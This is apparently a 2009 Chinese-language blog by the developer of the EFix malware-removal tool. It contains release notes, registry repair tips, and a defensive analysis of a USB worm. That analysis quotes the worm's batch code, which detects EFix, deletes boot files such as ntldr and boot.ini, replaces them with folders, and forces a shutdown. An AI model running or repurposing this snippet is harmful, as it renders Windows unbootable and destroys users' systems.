2009年8月28日 星期五

EFix Ver 5.2 20090828.61

版本: 5.2 20090828.61

檔案資訊:
File size: 909284 bytes
MD5...: 26b5fae0c7cacd482313a5d4ce6aefdb
SHA1..: 77fdc3f8d8eb8d721873bd902b621488df9b497d

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
修改腳本del driver::以及其他一些bug

2009年8月23日 星期日

EFix Ver 5.2 20090823.59

版本:5.2 20090823.59

檔案資訊:
File size: 918594 bytes
MD5...: 5429024152dee3d418ccaa16344ad65c
SHA1..: cad3f3d570a81efd72b901cf3f71489aa6932b83

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
增加刪除檔案
修bug

EFix Ver 5.2 20090823.55

版本資訊:5.2 20090823.55

檔案資訊:
File size: 918459 bytes
MD5...: de4a0ad03b7720f3f94485f1bbe78fa0
SHA1..: a5b9ed9ca287a5b0f76229d363cd20adf5716283

測試過的作業系統:
Windows XP SP2
Windows 7 RC 7100

修改事項:
因應針對EFix作的惡意程式,將主程序作了一個修改.避免執行EFix之後病毒抓取到主程序EF.COM之後進行自爆並毀滅作業系統的情形.
修正一點不重要的bug

有意思...

這一次碰到的隨身碟資料夾型病毒很有意思

感謝香菇小精靈隨身碟病毒清除軟體作者提供了一些資訊

是這樣的.

前幾天我有跟人提到就是台灣製的隨身碟病毒

這個隨身碟病毒有變種

而他這一次的變種有針對EFix而來.

這還第一次碰到....還蠻有意思的

香菇小精靈有提到該病毒會檢測系統裡面的程序

該批次代碼如下:


tasklist|findstr /c:"ef.com" && (goto :kill)

:kill
taskkill /F /IM explorer.exe
del /f /s /q /a:h %SystemDrive%\boot.ini
del /f /s /q /a:h %SystemDrive%\IO.sys
del /f /s /q /a:h %SystemDrive%\CONFIG.SYS
del /f /s /q /a:h %SystemDrive%\ntldr
del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT
del /f /s /q /a:h %SystemDrive%\MSDOS.SYS
md %SystemDrive%\boot.ini
md %SystemDrive%\IO.sys
md %SystemDrive%\CONFIG.SYS
md %SystemDrive%\ntldr
md %SystemDrive%\AUTOEXEC.BAT
md %SystemDrive%\MSDOS.SYS
del /f /s /q "%windir%\system32\drivers\pci.sys"
md "%windir%\system32\drivers\pci.sys"
shutdown -f -s -t 0
del %0

上面的代碼我大概解釋一下
該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序
有的話,就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去

然而ef.com 就是EFix使用的主運作程序....XD

所以我想之前有一位版友有碰到ntldr移失的,我看大概就是因為這樣的原因
好樣的....


我這兩天會找時間再做一些修改,看看能不能突破這惡意攻擊...
有中的人自己先小心點.

2009年8月17日 星期一

EFix Ver 5.2 20090817.52

版本: 5.2 20090817.52

檔案資訊:
File size: 908629 bytes
MD5...: 4b25d2732e748992926ac864e121bf81
SHA1..: 23111eda18e2e675fd7eea7981d06cd5736abf7d

測試過的作業系統
Windows XP SP2
Windows 7 RC 7100

修改事項:
增加刪除檔案
修正特殊模式4的偵測全部跳過的問題

2009年8月14日 星期五

EFix Ver 5.2 20090814.51

版本:5.2 20090814.51

檔案資訊:
File size: 908439 bytes
MD5...: 007e306f1627aa54b11f937d3401bf2a
SHA1..: cf023785670944954916ae26ff2831dacbf1d672

測試過的作業系統:
Windows XP SP2 SP3
Windows 7 RC1 7100

修改事項:
自定義腳本參數增加
List File::
List Folder::
all Process::
修正驅動項目還沒經過白名單過濾就直接進行黑名單比對的問題.

首頁被綁架進選項變灰色不能動的解決方式

這邊一樣也是測試那個台灣製資料夾病毒所產生出來的東西

首頁會被綁架變成哪個網址我忘記了0rz
晚一點在測一下
11:49補充:該網址是 11bc0072.linkbucks.com

而綁架之後在IE的網際網路選項內的首頁會變成灰色無法修改回來
而要回復成可以修改的方式可使用底下的方法試看看 (不保證一定會好)

注意:底下的操作具有一定風險性,如沒有把握請找他人幫忙處理.

複製底下的紅色文字

REGEDIT4
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer]


之後開啟記事本將複製的文字貼上 (注意:[到]之間是同一行包含[])
之後按另存新檔
檔案名稱取名為123.reg
檔案類型選所有檔案
編碼選ANSI

之後執行123.reg後按下確定.
然後重開機開IE在去修改即可.

2009年8月6日 星期四

EFix Ver 5.2 20090806.47

版本資訊: 5.2 20090806.47

檔案資訊:
File size: 907554 bytes
MD5 : 92352fc15766af12f95efbcfddc452a5
SHA1 : 183b3f69b4d09ca9c46a715346fd8218fcc43d55

測試過的作業系統:
Windows XP SP2 SP3
Windows 7 RC7100

修改事項:
增加對近期比較多的台灣製批次型隨身碟偽裝成資料夾的病毒主檔作一個較完整的處理
但並不處理隨身碟上所產生的偽裝檔,因為會引響到執行速度
所以有中的人如果要清理請先執行EFix
EFix會將常駐在系統的病毒主檔破壞刪除.
之後在將隨身碟內建立的偽裝資料夾病毒自行清理掉即可.

2009年8月5日 星期三

無法刪除的使用者帳戶

這邊是在測試病毒的時候發現的...

處理方式
XP SP2

先開啟登錄編輯器
然後尋找
HKEY_LOCAL_MACHINE\SAM
按右鍵選使用權限
將administrator允許的地方打勾
打勾之後到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
去找那一個不知道為何多出來的使用者名稱將他刪除就可以.
刪除完之後到HKEY_LOCAL_MACHINE\SAM的位置將權限還原.

但要注意這樣有可能會造成系統崩潰或者是不穩定
使用時要三思.

EFix Ver 5.2 20090805.44

版本:5.2 20090805.44

檔案資訊:
File size: 907028 bytes
MD5...: 5661de8671e71d68eda20641e95b2d1d
SHA1..: 6ee7e4221379c7b9e06d62dbf936469c9f7fb8ea

測試過的作業系統
Windows XP SP3
Windows 7 RC7100

修改事項:
修正誤刪adobe系列的東西.這一版修正先放出來
晚一點還有一個地方要處理,但誤刪是最優先處理的所以先放出來.

2009年8月4日 星期二

EFix Ver 5.2 20090804.43

版本: 5.2 20090804.43

檔案資訊:
File size: 907002 bytes
MD5...: 8982fd5faa3fcf2c67b1b9e69b5e065a
SHA1..: 8728c4b368cc40fd755018c9c78df8e99c9d78de

測試過的作業系統:
Windows XP SP3
Windows 7 RC7100

修改事項:
增加一個檔案現在沒用到,以後會有機會用到
強化對台灣製資料夾病毒的偵測
修改部分人執行到script gui內會變亂碼的情形 (html語系問題)
系統分析日期建立檔案增加windows\system資料夾.